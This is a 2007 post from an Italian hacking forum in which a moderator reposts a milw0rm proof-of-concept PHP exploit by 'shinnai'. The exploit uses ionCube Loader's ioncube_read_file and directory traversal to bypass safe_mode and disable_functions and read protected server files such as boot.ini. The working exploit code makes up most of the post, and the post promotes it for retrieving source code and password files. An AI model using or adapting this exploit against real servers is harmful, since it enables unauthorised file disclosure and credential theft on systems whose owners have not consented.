Xhack
Vuoi reagire a questo messaggio? Crea un account in pochi click o accedi per continuare.
Xhack

Un forum dedicato all'hacking
 
IndiceIndice  PortalePortale  CercaCerca  Ultime immaginiUltime immagini  RegistratiRegistrati  Accedi  

 

 [PHP+ionCube] Safe_mode e disable_functions bypassing

Andare in basso 
AutoreMessaggio
BlackLight
Moderatore
Moderatore
BlackLight


Numero di messaggi : 277
Età : 37
Data d'iscrizione : 22.08.07

[PHP+ionCube] Safe_mode e disable_functions bypassing Empty
MessaggioTitolo: [PHP+ionCube] Safe_mode e disable_functions bypassing   [PHP+ionCube] Safe_mode e disable_functions bypassing EmptyVen Ott 12, 2007 12:42 am

Codice:
<?php
//PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass

//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org

//Tested on xp Pro sp2 full patched, worked both from the cli and on apache

//Technical details:
//ionCube version: 6.5
//extension: ioncube_loader_win_5.2.dll (other may also be vulnerable)
//url: www.ioncube.com

http://php.ini settings:
//safe_mode = On
//disable_functions = ioncube_read_file, readfile

//Description:
//This is useful to obtain juicy informations but also to retrieve source
//code of php pages, password files, etc... you just need to change file path.
//Anyway, don't worry, nobody will read your obfuscated code :)

//greetz to: BlackLight for help me to understand better PHP

http://P.S.
//This extension contains even an interesting ioncube_write_file function...

if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required!");
$path = str_repeat("..\\", 20);

$MyBoot_readfile = readfile($path."windows\\system.ini"); #just to be sure that I set correctely disable_function :)
$MyBoot_ioncube = ioncube_read_file($path."boot.ini");

echo $MyBoot_readfile;
echo "<br><br>ionCube output:<br><br>";
echo $MyBoot_ioncube;
?>

# milw0rm.com [2007-10-11]

Questo codice ad opera di shinnai è in grado di bypassare le eventuali protezioni contro funzioni vulnerabili come readfile e ioncube_read_file specificate nel php.ini del server web Apache. Bypassando queste protezioni si può passare a readfile un buffer appositamente costruito (con un directory climbing) e visualizzare file riservati, come system.ini o boot.ini.

p.s. Grazie shinnai per aver citato anche me Wink
In effetti il buco è abbastanza grosso...
Torna in alto Andare in basso
http://blacklight.gotdns.org
 
[PHP+ionCube] Safe_mode e disable_functions bypassing
Torna in alto 
Pagina 1 di 1

Permessi in questa sezione del forum:Non puoi rispondere agli argomenti in questo forum.
Xhack :: Other :: Sicurezza-
Vai verso: